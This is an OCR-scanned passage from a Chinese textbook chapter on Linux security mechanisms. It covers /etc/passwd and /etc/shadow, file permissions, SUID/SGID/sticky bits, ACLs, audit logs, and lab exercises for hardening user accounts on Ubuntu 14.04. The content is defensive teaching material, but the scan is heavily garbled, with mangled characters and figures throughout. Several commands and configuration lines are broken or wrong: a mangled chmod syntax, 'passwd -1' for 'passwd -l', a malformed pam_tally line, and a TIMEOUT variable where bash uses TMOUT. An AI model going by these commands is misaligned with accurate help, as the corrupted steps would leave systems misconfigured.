口令 是 确认 数据 ,Linux 使 用 改进 的 DES 算法 (通过 调用 crypt() 函数 实 现 ) 对 其 加 密 , 并 
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root:x:0:0:root:/root:/ bin/bash 
їп:х: in:/bin:/sbin/nologin 
:daemon:/sbin:/sbin/nologin 
m:/var/adm:/sbin/nologin 
'ar/ spool /Ipd:/sbin/nologin 
nc:/sbin:/ bin/sync 


:0:shutdown:/sbin:/sbin/shutdown 
halt:/sbin:/sbin/halt 


ail: /var/spool/mail:/sbin/nologin 
news:/etc/news: 
:uucp:/var/ spool/uucp:/sbin/nologin 
operator:x: 1 1:0:operator:/root:/sbin/nologin 
O0:games:/usr/games:/sbin/nologin 
30:gopher:/var/ gopher:/ sbin/nologin 
:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin 


图 5.1 /etc/passwd 文件 内 容 


将 结果 与 存储 在 数据 库 中 的 用 户 加 密 口 令 进行 比较 , 若 两 者 匹配 , 则 说 明 该 用 户 为 合法 用 
户 ,否则 为 非法 用 户 。 
为 了 防止 口令 被 非 授 权 用 户 盗用 ,对 口令 的 设置 应 以 复杂 ,不 可 猜测 为 标准 。 一 个 好 
的 口令 应 该 满足 长 度 和 复杂 度 要 求 , 并 且 定 期 更 换 , 通 常 ,口令 以 加 密 的 形式 表示 ,由 于 / 
etc/passwd 对 任何 用 户 可 读 ,故常 成 为 口令 攻击 的 目标 ,在 后 期 的 UNIX 版 本 以 及 所 有 
Linux 版 本 中 ,引入 了 影子 文件 的 概念 ,将 密码 单独 存放 在 /etc/shadow 中 ,而 原来 /etc/ 
passwd 文件 中 存放 口令 的 域 用 x 来 标记 。 文 件 /etc/shadow 只 对 root 用 户 拥 有 读 权 ,对 
普通 用 户 不 可 读 ,以 进一步 增强 口令 的 安全 。 
/etc/shadow 每 一 行 记录 包含 9 个 字段 ,用 分 号 隔 开 ,如 图 5. 2 所 示 , 分 别 描述 用 户 
名 ,加密 后 的 口令 信息 口令 的 有 效 期 等 信息 。 
root:$ 1$rsvOv 1rO$UqValómm IckLxQlzzHQWa0:; 12524;0;99999;7;;; 
bin:*:12524:0:99999:7::: 
daemon:*:12524:0:99! 
adm:*:12524:0:99999:7; 
1р:*:12524:0:99999:7. 
ѕупс:*:12524:0:99999 


shutdown:*:12524:0:99999:7::: 
halt:*:12524:0:99999:7::: 


mail:*; 12524:0:99999:7. 


news:*:12524:0:99999 
uucp:*:12524:0:99999: 
operator:*:12524:0:999! 
games:*:12524:0:99999 
gopher:*: 12524:0:99999. 
ftp:*:12524:0:99999:7::: 
nobody:*:12524:0:99999:7::: 


图 5.2 /etc/shadow 


5.1.2 访问 控制 


Linux 系统 的 访问 控制 是 基于 文件 的 ,在 Linux 系统 中 各 种 硬件 设备 、 端 口 甚 至 内 存 
都 是 以 设备 文件 的 形式 存在 的 ,虽然 这 些 文件 和 普通 文件 在 实现 上 是 不 同 的 ,但 它们 对 外 
提供 的 访问 接口 是 一 样 的 ,这 样 就 给 Linux 系统 资源 的 访问 控制 带 来 了 实现 上 的 方便 。 
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Linux 提供 的 访问 控制 机 制 为 自主 访问 控制 ,早期 的 Linux 将 用 户 进 行 分 组 授权 ,一 
般 分 为 属 主 用 户 、 同 组 用 户 和 其 他 用 户 三 类 ,这 种 访问 控制 的 粒度 比较 粗 , 无 法 实现 对 单 
个 用 户 的 授权 。 目 前 的 Linux 在 支持 粗 粒度 自主 访问 控制 的 基础 上 ,利用 访问 控制 列表 
(Access Control List,ACL) 机 制 .能 够 实现 对 单个 用 户 的 授权 。 

1. 访问 权限 

命令 ls 可 列 出 文件 (或 目录 ) 对 系统 内 不 同 用 户 所 给 予 的 访问 权限 ,如 : 


—rw-r--r-- 1 root root 1397 Mar 7 10:20 passwd 


图 5.3 给 出 了 文件 访问 权限 的 图 示 解 释 。 


к--4 
E 
х 

к--4 
- 
х 

к--4 


[~ 其 他 用 户 的 权限 
同 组 用 户 的 权限 
文件 拥有 者 的 权限 


= 文件 类 型 
图 5.3 Linux 自主 访问 控制 


访问 权限 位 共有 9 位 ,分 为 3 组 ,用 以 指出 不 同类 型 的 用 户 对 该 文件 的 访问 权限 。 

权限 有 3 种 : 

(1) r RË; 

(2) w, 人 允许 写 ; 

(3) x, 人 允许 执行 。 

用 户 有 3 种 类 型 : 

(1) owner, 文 件 的 属 主 , 表 示 文 件 是 由 该 用 户 创建 的 ; 

(2) group ,与 该 文件 属 主 同 组 的 用 户 , 即 同 组 用 户 ， 

(3) other, 除 以 上 两 者 外 的 其 他 用 户 。 

图 5. 3 表示 文件 的 属 主 具有 读 、 写 及 执行 权限 (rwx), 同 组 用 户 允 许 读 和 执行 操作 
(rx) ,其 他 用 户 没有 任何 权限 。 在 权限 位 中 ,一 表示 相应 的 访问 权限 位 不 允许 。 为 操作 方 
便 ,可 以 通过 数字 表示 法 对 文件 权限 进行 描述 ,这 种 方法 将 每 类 用 户 的 权限 看 作 一 个 3 位 
二 进 制 数值 ,具有 权限 的 位 置 用 1 表示 ,没有 权限 的 位 用 0 表示 ,图 5.3 中 的 rwxr-x--- 用 
数字 表示 为 750。 

上 述 授权 模式 同样 适用 于 目录 ,目录 的 文件 类 型 为 d。 目录 的 读 权限 是 指 用 15 列 出 
目录 中 内 容 的 权限 ; 写 权 限 是 指 在 目录 中 增删 文件 的 权限 ; 执行 权限 是 指 进入 目录 或 将 
该 目录 作 路 径 分 量 的 权限 。 因 此 要 使 用 任 一 文件 ,必须 要 有 搜索 该 文件 所 在 路 径 上 所 有 
目录 分 量 的 权限 , 仅 当 要 打开 一 个 文件 时 ,文件 的 权限 才 开 始 起 作用 ,而 rm、mv 只 要 有 
目录 的 搜索 和 写 权 限 , 并 不 需要 有 文件 的 权限 ,这 一 点 应 尤为 注意 。 

root 用 户 对 任何 文件 或 目录 均 可 进行 任何 操作 ,具有 最 高 权力 ,这 样 方便 了 管理 员 
对 系统 的 管理 ,但 同时 也 是 一 个 潜在 的 安全 隐患 ,对 于 root 账户 的 使 用 ,需要 注意 以 下 
几 点 : 
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(1) 除非 必要 ,尽量 避免 以 root 用 户 身 份 登录 ; 

(2) 不 要 随意 将 root shell 留 在 终端 ; 

G) 不 要 以 root 身份 运行 其 他 用 户 的 或 来 源 不 明 的 程序 。 

2. 改变 权限 

改变 文件 的 访问 权限 可 使 用 chmod 命令 ,并 以 新 权限 和 该 文件 名 为 参数 ,格式 为 : 


chmod [ - R£h] 访问 权限 文件 名 


chmod 也 有 其 他 方式 可 直接 对 某 组 参数 进行 修改 , 详 见 Linux 系统 的 联机 手册 。 合 
理 的 文件 授权 可 防止 偶然 性 的 覆盖 或 删除 文件 ,改变 文件 的 属 主 和 组 名 可 用 chown 和 
chgrp, 但 修改 后 原 属 主 和 组 员 就 无 法 修改 回来 了 。 

文件 的 授权 可 用 一 个 4 位 的 八进制 数 表示 ,后 3 位 对 应 图 5. 3 所 示 的 三 组 权限 , 授 以 
权限 时 相应 位 置 为 1, 不 授 以 权限 时 则 相应 位 置 为 0。 最 高 的 一 个 八进制 数 分 别 对 应 
SUID 4 ,SGID 位 „sticky 位 。 

umask(Linux 对 用 户 文件 模式 屏蔽 字 的 缩写 ) 也 是 一 个 4 位 的 八进制 数 ,Linux 用 它 
确定 一 个 新 建文 件 的 授权 。 每 一 个 进程 都 有 一 个 从 它 的 父 进程 中 继承 的 umask。umask 
说 明 要 对 新 建文 件 或 新 建 目录 的 默认 授权 加 以 屏蔽 的 部 分 。 

新 建文 件 的 真正 访问 权限 二 (一 umask) & (文件 授权 ) 

Linux 中 相应 有 umask 命令 ,车 将 此 命令 放 入 用 户 的 . profile 文件 ,就 可 控制 该 用 户 
后 续 所 建文 件 的 访问 许可 。umask 命令 与 chmod 命令 的 作用 正好 相反 , 它 告诉 系统 在 创 
建文 件 时 不 给 予 哪些 访问 权限 。 

3. 特殊 权限 位 

Linux 系统 中 文件 的 属性 还 包括 SUID、SGID 以 及 sticky 属性 ,用 来 表示 文件 的 一 些 
特殊 性 质 。 

1) SUID 

有 时 用 户 需 要 完成 只 有 拥有 特定 权限 才能 完成 的 任务 ,如 对 于 普通 用 户 , 当 通 过 
/usr/bin/passwd 命令 修改 自己 的 口令 时 会 涉及 对 /etc/passwd 文件 的 修改 操作 ,而 普通 
用 户 不 拥有 修改 /etc/passwd 文件 的 权限 ,通过 对 可 执行 文件 /usr/bin/passwd 设置 
SUID(Set User ID) 可 以 解决 这 个 问题 。 


# ls -a /usr/bin/passwd 

* -rwsr-xr-x1 root root 

/usr/bin/passwd 就 是 一 个 设置 了 SUID 的 程序 .有 时 又 称 为 s 位 程序 ,普通 用 户 执 
行 该 程序 时 ,将 暂时 拥有 /usr/bin/passwd 这 个 可 执行 文件 的 属 主 root 的 权限 ,因此 可 以 
修改 自己 的 口令 。 

用 “chmod «+5 X fF" fll" chmod u-s 文件 名 ”来 设置 和 取消 SUID 权限 位 。 

SUID 程序 会 使 普通 用 户 权 限 得 到 提升 ,从 而 给 系统 安全 带 来 威胁 ,为 了 保证 SUID 
程序 的 安全 性 ,系统 管理 员 应 对 系统 中 所 有 设置 SUID 的 程序 进行 定期 的 检查 和 监视 , 严 
格 限制 功能 范围 ,不 能 有 违反 安全 性 规则 的 SUID 程序 存在 ,并 且 要 保证 SUID 程序 自身 
不 能 被 任意 修改 。 
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2) SGID 

该 属性 既 可 作用 在 可 执行 文件 上 也 可 作用 在 目录 上 , 当 作 用 在 可 执行 文件 上 时 , 它 将 
使 执行 该 文件 的 进程 拥有 同 组 用 户 的 权限 ,但 这 个 功能 几乎 不 用 。 当 SGID 属性 作用 到 
目录 时 ,可 以 用 于 设置 该 目录 下 创建 的 文件 和 子 目录 的 默认 组 权限 。 

默认 情况 下 ,一 个 用 户 创 建 一 个 文件 ,用 户 的 有 效 主 组 就 设置 为 该 文件 的 组 属 主 ,这 
种 默认 设置 在 有 些 情 况 下 并 不 方便 。 想 象 这 样 的 场合 ,用 户 linda 和 lori 在 会 计 部 门 工 
作 , 共 享 目录 /account, 为 授权 方便 ,将 他 们 都 设置 为 组 account 的 成 员 。 默 认 情 况 下 ,这 
些 用 户 是 以 用 户 名 命名 的 组 的 成 员 , 两 个 用 户 又 同时 是 account 组 的 成 员 , 但 account 组 
只 能 是 这 些 用 户 的 第 二 备 选 组 。 当 一 个 用 户 在 /account 目录 下 创建 了 文件 ,用 户主 组 成 
为 文件 的 组 拥有 者 ,但 是 如 果 为 该 /account 目录 设置 了 SGID 权限 ,并 且 设 置 组 account 
作为 目录 的 主 组 ,所 有 在 该 目录 下 创建 的 文件 和 子 目 录 将 组 account 作为 默认 的 组 拥有 
者 ,这 样 通过 为 account 组 设置 文件 操作 权限 ,方便 文件 在 同 组 用 户 之 间 共 享 。 

可 以 利用 “chmod g 十 s 文件 名 ”和 “chmod gs 文件 名 ”命令 来 设置 和 取消 SGID 权限 位 。 

3) sticky 

该 权限 位 的 主要 作用 是 当 有 多 个 用 户 对 同一 目录 具有 写 权限 时 ,为 了 防止 某 个 用 户 
的 误 操 作 而 删除 其 他 用 户 创建 的 文件 。 当 为 共享 目录 设置 了 sticky 属性 时 ,用 户 仅 可 在 
以 下 情况 下 删除 文件 : 

(1) 用 户 是 文件 的 属 主 ; 

(2) 用 户 是 文件 所 在 目录 的 属 主 。 


5.1.3 审计 


审计 是 Linux 安全 机 制 的 重要 组 成 部 分 , 它 通 过 对 安全 相关 事件 进行 记录 和 分 析 ,发 
现 违 反 安全 策略 的 活动 ,确保 安全 机 制 正确 工作 并 能 对 系统 异常 及 时 报警 提示 。 审 计 记 
录 常 写 在 系统 的 日 志文 件 中 ,丰富 的 日 志 为 Linux 的 安全 运行 提供 了 保障 。 常 见 的 日 志 
文件 如 表 5. 1 所 示 。 


表 5.1 审计 文件 
日 志文 件 说 明 
acct 或 pacct 记录 每 个 用 户 使 用 过 的 命令 
aculog 筛选 出 modems( 自 动 呼叫 部 件 ) 记 录 
lastlog 记录 用 户 最 后 几 次 成 功 登录 事件 和 最 后 一 次 登录 失败 的 事件 
loginlog 记录 不 良 的 登录 尝试 
messages 记录 输出 到 系统 主 控 台 及 由 syslog 系统 服务 程序 产生 的 信息 
sulog 记录 su 命令 的 使 用 情况 
utmp 记录 当前 登录 的 每 个 用 户 
wtmp 记录 每 一 次 用 户 登 录 和 注销 的 历史 信息 ,以 及 系统 关 和 开 
xferlog 记录 ftp 的 访问 情况 


Linux 系统 中 传统 的 审计 机 制 是 Syslogd 和 Klogd。Syslog 是 一 个 应 用 层 的 审计 机 
制 , 允 许 应 用 程序 将 审计 信息 传递 给 系统 日 志 守 护 程序 Syslogd, 由 Syslogd 根据 配置 文 
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TF C/etc/syslogd. conf) 将 收 到 的 信息 按 类 型 作 相 

应 处 理 , 写 入 不 同 的 日 志文 件 ,如 图 5.4 所 示 。 另 AANER 

外 ,也 允许 内 核 消息 守护 进程 Klogd 将 内 核 中 通 1 

过 Printk 打印 出 的 消息 写 和 日志 文件 。 | 配置 文件 —- syslogd 进 程 | 
Linux 传统 的 审计 方式 具有 很 大 的 局 限 性 。 

首先 , 它 不 能 提供 系统 级 审计 记录 。Syslogd 只 能 

接收 由 应 用 程序 产生 的 日 志 信息 ,而 Klogd 只 能 

接收 内 核 中 由 Printk 打印 出 的 消息 ,这 两 种 方式 图 5.4 PU 


审计 信息 量 获取 有 限 ,审计 记录 不 够 详细 。 其 次 ， 
就 应 用 层 审 计 而 言 ,Syslog 也 是 有 局 限 性 的 。Syslog 产生 的 审计 信息 完全 依赖 于 应 用 程 
序 。 如 果 入 侵 者 熟悉 Syslog 的 工作 方式 ,就 可 以 模仿 与 某 个 应 用 程序 相同 的 方式 写 入 日 
志 , 伪 造 出 虚假 的 审计 数据 。 一 旦 某 个 收集 审计 数据 的 外 部 服务 程序 被 恶意 用 户 杀 掉 后 ， 
由 该 服务 程序 所 收集 的 某 类 审计 记录 就 不 会 产生 ,这 样 审计 系统 也 就 达 不 到 记录 所 有 安 
全 相关 系统 活动 的 目的 。 

为 了 达到 TCSEC 所 规定 的 C2 级 的 审计 标准 ,当前 的 UNIX/Linux 系统 都 对 传统 审 
计 机 制 进行 了 改进 和 增强 。 


5.2 Linux 标识 和 鉴别 实验 


5.2.1 实验 目的 
掌握 用 户 账户 安全 设置 方法 ; 掌握 账户 锁定 策略 .账户 注销 策略 的 设置 方法 。 
5.2.2 实验 内 容 及 环境 


1. 实验 内 容 

在 Linux 安装 完成 后 ,需要 对 用 户 账 户 进行 适当 的 配置 以 提高 系统 的 安全 性 ,主要 涉 
及 清除 多 余 账户 清除 多 余 用 户 组 、 锁 定 系统 伪 账 户 、 检 查 是 否 存在 空 口令 账户 .对 root 
账户 进行 保护 等 ; 当前 Linux 采用 的 最 常用 的 身份 认证 方式 是 口令 认证 ,为 防范 对 于 口 
令 的 字典 攻击 和 暴力 破解 ,需要 对 用 户 鉴 别 机 制 进 行 相应 的 安全 设置 ,包括 设置 账户 锁定 
策略 .设置 账户 注销 策略 等 。 

2. 实验 环境 

主流 配置 计算 机 一 台 , 安 装 Ubuntul4. 04。 


5.2.3 实验 步骤 


1. 清除 多 余 账户 

账户 是 黑客 人 侵 系统 的 突破 口 :系统 的 账户 越 多 ,黑客 们 得 到 合法 用 户 权限 的 可 能 性 
一 般 也 就 越 大 。 我 们 需要 定期 查看 账户 口令 文件 ,与 系统 管理 员 确 认 后 删除 一 些 不 必要 
的 账户 ,删除 用 户 的 命令 为 userdel, 利 用 该 命令 删除 sync, news, uucp, games 等 账户 ,这 
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些 账户 为 系统 默认 创建 但 很 少 使 用 的 账户 ,具体 用 法 如 图 5.5 所 示 。 


6650 ср@иһипги:- 


cp@ubuntu:~$ sudo userdel sync 
[sudo] password for cp: 
|cpgubuntu:-$ 


图 5.5 删除 用 户 


删除 用 户 通 常 由 管理 员 账 户 root 执行 ,在 Ubuntu 14. 04 中 ,root 用 户 默认 没有 启 
用 ,可 以 参考 相应 的 资料 查看 如 何 开 启 root 用 户 . 也 可 通过 sudo 命令 临时 以 root 用 户 的 
权限 执行 部 分 操作 ,这 种 方式 更 符合 安全 策略 的 要 求 。 

2. 清除 多 余 的 组 

同样 ,应 该 删除 系统 安装 时 默认 创建 但 很 少 使 用 的 组 账号 ,如 adm, dip 等 以 减少 系 
统 受 攻击 的 风险 ,删除 组 用 命令 groupdel, 其 用 法 如 图 5.6 所 示 。 


© © © cpQubuntu: ~ 
cpQubuntu:-$ sudo groupdel adm 
[sudo] password for cp: 
cpQubuntu: -$ 


图 5.6 删除 用 户 组 


3. 锁定 账户 登录 

如 果 某 些 账户 一 段 时 间 内 不 用 ,为 了 防止 被 恶意 用 户 利 用 ,可 以 锁定 这 些 账 户 以 禁止 
其 登录 ,在 需要 时 可 以 解锁 。 锁 定 账 户 的 命令 为 passwd -1 < 用 户 名 >; 解锁 账户 的 命令 为 
passwd -u < 用 户 名 >, 可 以 用 passwd -S 查看 用 户 状 态 ,如 图 5.7 所 示 。 

4. 禁用 root 之 外 的 超级 用 户 

执行 命令 : # cat /etc/passwd 

检查 账户 文件 中 的 用 户 ID ,. 若 用 户 ID=0, 则 表示 该 用 户 拥 有 超级 用 户 权 限 ,禁用 除 
root 之 外 的 超级 用 户 。 

5. 保护 root 账户 的 安全 策略 

由 于 root 账户 具有 最 高 权限 ,一 旦 被 攻击 者 获取 root 权限 ,将 对 系统 造成 巨大 的 危 
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OO root@ubuntu:~ 


root@ubuntu:~# passwd -l test 
passwd: password expiry information changed. 
rooteubuntu:-# passwd -S test 
test L 12/19/2018 8 99999 7 -1 
rootQubuntu:-£ passwd -u test 
passwd: password expiry information changed. 


root@ubuntu:~# passwd -S test 
test P 12/19/2018 8 99999 7 -1 
root@ubuntu:-# | 


图 5.7 锁定 用 户 


害 , 用 户 需 要 具备 以 下 对 root 账户 的 保护 意识 : 
a) 除非 必要 ,避免 以 超级 用 户 登录 ; 
(2) 严格 限制 root 只 能 在 某 一 终端 登录 ,远程 用 户 可 以 使 用 /bin/su -1 来 成 为 root; 
з) к 意 把 root shell 留 在 


端 ; 
某 人 确实 需要 以 root 来 运行 命令 , 则 考虑 使 用 sudo 命令 临时 以 root 身份 来 


(4) 
f vel. 
(5) 不 要 把 当前 目录 (*./”) 和 普通 用 户 的 bin 目录 放 在 root 账户 的 环境 变量 PATH 中 ; 
(6) 不 以 root 运行 其 他 用 户 或 来 源 不 明 的 程序 
6. 用 户口 令 策 略 的 设置 
为 了 防范 字典 攻击 和 暴力 破解 ,用 户 应 该 设置 强 口令 ,为 了 强制 用 户 设置 安全 口令 ， 
Linux 系统 提供 了 类 似 Windows 的 密码 策略 ,在 配置 文件 /etc/login. defs 中 进行 设置 ， 
如 图 5. 8 所 示 ,口令 策略 涉及 如 下 参数 ， 


(1) PASS_MAX_DAYS 99999 E # 密 码 设 置 最 长 有 效 期 (默认 值 ); 

(2) PASS MIN DAYS 0 E # 密 码 设置 最 短 有 效 期 ; 

(3) PASS MIN LEN 5 # # 设 置 密码 最 小 长 度 ; 

(4) PASS WARN AGE 7 E # 提 前 多 少 天 警告 用 户 密码 即将 过 期 。 


© © соль: ~ 
ud 
# Password aging controls: 


PASS_MAX_DAYS Maximum number of days a password may be used. 
PASS_MIN_DAYS Minimum number of days allowed between password с 


PASS_WARN_AGE Number of days warning given before a password ex 


# Min/max values for automatic uid selection in useradd 
# 

UID_MIN 1908 

UID_MAX 60000 


图 5.8 设置 密码 策略 
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其 中 ,口令 的 最 小 长 度 设 置 可 以 在 /etc/login. defs 文件 中 通过 设置 参数 PASS_MIN_ 
LEN 进行 限制 ,也 可 以 利用 Linux PAM 机 制 , 下 载 libpan_cracklib 模块 ,基于 该 模块 在 
/etc/pam. d/common-password 文件 中 可 以 设置 更 加 精细 的 口令 策略 ,比如 口令 必须 包 
含 大 小 写字 母 的 个 数 、 特 殊 字符 的 个 数 .口令 由 几 种 类 型 的 字符 组 成 .新 口令 与 旧 口 令 不 
同 的 位 数 等 。 

7. 修改 自动 注销 账号 时 间 

在 Linux 系统 中 root 账户 具有 最 高 特权 ,如 果 系统 管理 员 在 离开 系统 之 前 忘记 注销 
root 账户 ,将 会 带 来 很 大 的 安全 隐患 ,安全 起 见 ,应 该 让 系统 自动 注销 用 户 。 通 过 修改 账 
户 中 TIMOUT 参数 ,可 以 实现 此 功能 ,编辑 你 的 profile 文件 /etc/profile 后 加 入 下 面 
iH. 

export TIMEOUT - 300 


300 表示 300 秒 , 也 就 是 表示 5 分 钟 ,如 图 5. 9 所 示 。 这 样 ,如 果 系 统 中 登录 的 用 户 
在 5 分钟 内 都 没有 动作 ,那么 系统 会 自动 注销 这 个 账户 。 


© © ©) root@ubuntu: ~ 


Р51='$ ' 
fi 


# The default umask is now handled by pam_umask. 
# See pam umask(8) and /etc/login.defs. 


if [ -d /etc/profile.d ]; then 
for i in /etc/profile.d/*.sh; do 
tf [ -r $i ]; then 
m 


export TIMEOUT-308 


图 5.9 设置 用 户 注销 时 间 


而 在 Redhat 等 版 本 的 Linux 中 ,打开 /etc/profile 文件 ,找到 配置 项 HISTSIZE ,在 
它 的 下 一 行 添加 TIMEOUT-300 即 可 。 

8. 设置 账户 登录 失败 锁定 次 数 、 锁 定时 间 

在 Ubuntu 14. 04 中 账户 登录 失败 锁定 的 次 数 也 是 在 配置 文件 /etc/login. defs 中 设 
置 ,如 图 5. 10 所 示 ,但 是 如 果 系 统 启用 PAM 登录 机 制 的 话 , 相 应 的 锁定 策略 由 PAM 机 
制 设 置 。 

而 在 Redhat 等 版 本 的 Linux 中 ,可 以 编辑 文件 /etc/pam. d/system-auth ,设置 auth 
required pam_tally. so 为 需要 的 策略 : 


auth required pam tally.so опегг = fail deny- 6 unlock time = 300 


设置 密码 连续 错误 6 次 锁定 账户 , 且 锁 定时 间 为 300 秒 。 
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© © © root@ubuntu: ~ 

# System accounts 

#SYS_GID_MIN 100 

#SYS CIN MAX E 
Files 


# 
# Max number of login retries if password is bad. This will most likely be 
# overriden by PAM, since the default pam_unix module has it's own built 
# in of 3 retries. However, this is a safe fallback in case you are using 
# an authentication module that does not enforce PAM_MAXTRIES. 

# 

[E 


OGIN RETRIES 5 


# 

# Max time in seconds for login 
LÀ 

LOGIN TIMEOUT 66 


Which fields may be changed by regular users using chfn - use 
any combination of letters "frwh" (full name, room number, work 
phone, home phone). If not defined, no changes are allowed. 
For backward compatibility, "yes" - "rwh" and "no" - "frwh". 


ð 
e 
B 
lu] 
& 
* 
а 
#7 
«я 


图 5.10 设置 用 户 登 录 失败 次 数 


5.3 Linux 访问 控制 实验 


5.3.1 实验 目的 
掌握 自主 访问 控制 的 概念 ; 掌握 文件 和 目录 自主 访问 控制 的 设置 。 
5.3.2 实验 内 容 及 环境 


1. 实验 内 容 

利用 Linux 自主 访问 控制 机 制 实现 用 户 授 权 ; 利用 Linux 访问 控制 列表 实现 用 户 授 
权 ; 目录 文件 的 访问 权限 控制 。 

2. 实验 环境 

主流 配置 计算 机 ,安装 Ubuntul4. 04。 


5.3.3 ”实验 步骤 


1. 利用 Linux 自主 访问 控制 机 制 实现 用 户 授权 

(1) 以 root 创建 用 户 linda 和 lucy, 并 分 别 为 两 个 用 户 设置 密码 ,如 图 5. 11 所 示 。 

(2) 用 户 linda 用 touch 命令 创建 文件 helloworld ,查看 helloworld 的 文件 权限 ,测试 
用 户 lucy 能 和 否 写 , 可 以 看 到 文件 写 和 失败 ,请 求 被 拒绝 ,如 图 5. 12 所 示 。 

(3) 用 户 linda 用 chmod 命令 修改 文件 helloworld 的 权限 ,使 得 lucy 能 写 文 件 , 如 
图 5.13 所 示 。 


“© 
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Өе ® root@ubuntu:~ 


rootQubuntu:-4 useradd linda 
rootQubuntu:-4 passwd linda 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 
rootgubuntu:-£ useradd lucy 
rootQubuntu:-£ passwd lucy 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 
root@ubuntu:-# 


图 5.11 新 建 用 户 


OS® root@ubuntu:~ 

rootgubunt: su linda 
lindagubuntu:/root$ cd /tmp 
lindagubuntu:/tmp$ touch helloworld 
lindagubuntu:/tmpS ls -l helloworld 
ги-ги-г-- 1 linda linda 0 Dec 18 20:12 helloworld 
lindagubuntu:/tmpS su lucy 

Password: 

lucy@ubuntu: /tmp$ echo hello-helloworld 
bash: helloworld: Permission denied 
lucygubuntu: /tmpS 


图 5.12 创建 文件 并 测试 文件 默认 权限 


©©© rootCubuntu: ~ 

rootgubunt: su linda 

lindagubuntu:/root$ cd /tmp 

lindaQubuntu:/tmpS chmod 666 helloworld 
lindagubuntu:/tmpS ls -l helloworld 

-rW-rW-rw- 1 linda linda Ө Dec 18 20:12 helloworld 
lindagubuntu:/tmpS su lucy 


tmp$ echo hello»helloworld 
:/tmp$ cat helloworld 


lucygubuntu: /tnp$ 


图 5.13 修改 文件 权限 并 测试 


2. 利用 Linux 访问 控制 列表 实现 用 户 授 权 

(1) 以 lucy 用 户 身份 创建 文件 worldhello, 查 看 文件 权限 ,可 以 看 到 用 户 linda 对 文 
{Е worldhello 没有 写 权 限 lucy 利用 setfacl 设置 用 户 linda 的 权限 ,并 通过 getfacl 查看 
文件 worldhello 权限 。 切 换 到 linda JH P! ,尝试 往 该 文件 中 写 入 内 容 , 可 以 看 到 文件 写 入 
成 功 ,如 图 5. 14 所 示 。 

(2) 使 用 -x 选项 删除 linda 对 文件 worldhello 的 访问 权限 ,然后 再 次 尝试 以 linda 用 
户 身份 对 文件 worldhello 进行 写 操作 ,可 以 看 到 写 操作 被 拒绝 ,如 图 5. 15 所 示 。 


вов Linux 安 全 机 制 Ve 


@ root@ubuntu: /tmp 


root@ubun /tmp 
root@ubun su lucy 

lucygubun touch worldhello 

lucygubun ls -l worldhello 

-rw-rw- lucy 6 Dec 18 20:22 worldhello 
lucygubun setfacl -m u:linda:rw worldhello 
lucygubuntu: / ls -l worldhello 


-rw-rw-r--+ 1 lucy lucy 8 Dec 18 20:22 worldhello 
lucygubuntu:/tmpS getfacl worldhello 
# file: worldhello 


lucy@ubuntu: /tmp$ su linda 
Password: 

lindagubuntu:/tmp$ echo hello»worldhello 
lindagubuntu:/tmpS cat worldhello 

hello 

lindagubuntu: /tmpS 


图 5.14 设置 单个 用 户 访问 权限 并 测试 


60 root@ubuntu: /tmp 


tmp# зи Lucy 

tmp$ setfacl -x u:linda worldhello 
lucygubuntu:/tmpS getfacl worldhello 
|t file: worldhello 


lucygubuntu:/tmpS su linda 

Password: 

lindagubuntu:/tmp$ touch world»worldhello 
bash: worldhello: Permission denied 
lindagubuntu: /tnpS 


图 5.15 删除 单个 用 户 访问 权限 并 测试 


3. 目录 文件 的 访问 权限 控制 

CD 用 户 linda 在 /tmp 目录 下 创建 目录 /tmp/data, 查 看 目录 权限 ,可 以 看 到 用 户 
lucy 对 于 目录 /tmp/data 拥有 读 和 执行 的 权限 。 在 新 建 目录 下 用 touch helloworld 创建 
文件 ,切换 当前 用 户 为 lucy, 由 于 拥有 对 data. 目录 的 读 权限 ,因而 可 以 利用 1s 列 出 目录 
/tmp/data 的 内 容 。 由 于 具有 对 data 目录 的 执行 权限 ,因而 利用 cd 进入 目录 ,但 由 于 不 
具有 对 目录 的 写 权限 , 所 以 不 能 在 该 目录 下 创建 文件 worldhello, 如 图 5. 16 所 示 。 

(2) 用 户 linda 修改 用 户 对 目录 /tmp/data 的 权限 ,依次 去 掉 其 他 用 户 对 目录 的 读 权 
限 和 执行 权限 ,验证 lucy 是 否 能 执行 ls 和 cd 操作 ,由 此 可 见 对 于 目录 的 读 权限 对 应 的 是 
列 出 目录 下 内 容 的 权限 ,目录 的 执行 权限 是 进入 目录 的 权限 ,如 图 5.17 所 示 。 

(3) 用 户 linda 修改 用 户 对 目录 /tmp/data 的 权限 ,使 其 他 用 户 具有 对 目录 的 读 、 写 
和 执行 权限 ,并 验证 ,如 图 5. 18 所 示 。 
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© © root@ubuntu: Атр 


root@ubuntu:~# cd /tmp 
root@ubuntu: /tmp# su linda 
lindagubuntu:/tmpS mkdir data 
lindagubuntu:/tmp$ ls -l 


drwxrwxr-x 
-rw-rw-rw- 
-rw-r--r-- 


root root Ө Dec 18 18:34 config-err-8JuQLs 
linda linda 4096 Dec 18 2 data 
linda linda б Dec 18 2 helloworld 
root root ө Dec 18 1 unity support test.8 
1 VMwareDnD 
1 vmware-root 
1 vmware-root-6980477706 
20:23 worldhello 


drwxr-xr-x 


root root 4096 Dec 18 

root root 4096 Dec 18 
--+ 1 lucy lucy 6 Dec 18 

lindagubuntu:/tmpS cd data/ 

lindagubuntu:/tmp/dataS touch helloworld 

lindagubuntu:/tmp/dataS cd . 

lindagubuntu:/tmpS su lucy 

Password: 

lucygubuntu:/tmpS 15 data 

helloworld 

lucy&ubuntu:/tmpS cd data 

lucyQubuntu:/tmp/dataS touch worldhello 

touch: cannot touch ‘worldhello’: Permission denied 

lucygubuntu: /tmp/dataS 


图 5.16 创建 目录 并 测试 昌 


1 
2 
1 
1 
drwxrwxrwt 2 root root 4096 Dec 18 
2 
2 
1 


认 访问 权限 
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rootQubuntu:-4 cd /tmp 
rootgubuntu:/tmpt su linda 
lindagubuntu:/tmpS chmod o-r data 
lindagubuntu:/tmp$ su lucy 
Password: 
lucyĝubuntu:/tmp$ 15 data 
ls: cannot open directory data: Permission denied 
lucy@ubuntu: /tmp$ cd data 
lucyQubuntu:/tmp/data$ ls 
ls: cannot open directory .: Permission denied 
lucygubuntu:/tmp/dataS cd 

/tmp$ su linda 


lindagubuntu:/tmp$ chmod o-x data 
lindagubuntu:/tmp$ su lucy 
Password: 

lucygubuntu:/tmpS cd data 

bash: cd: data: Permission denied 
lucygubuntu: /tmpS 


验证 目录 权限 含义 


OOO root@ubuntu: ~ 


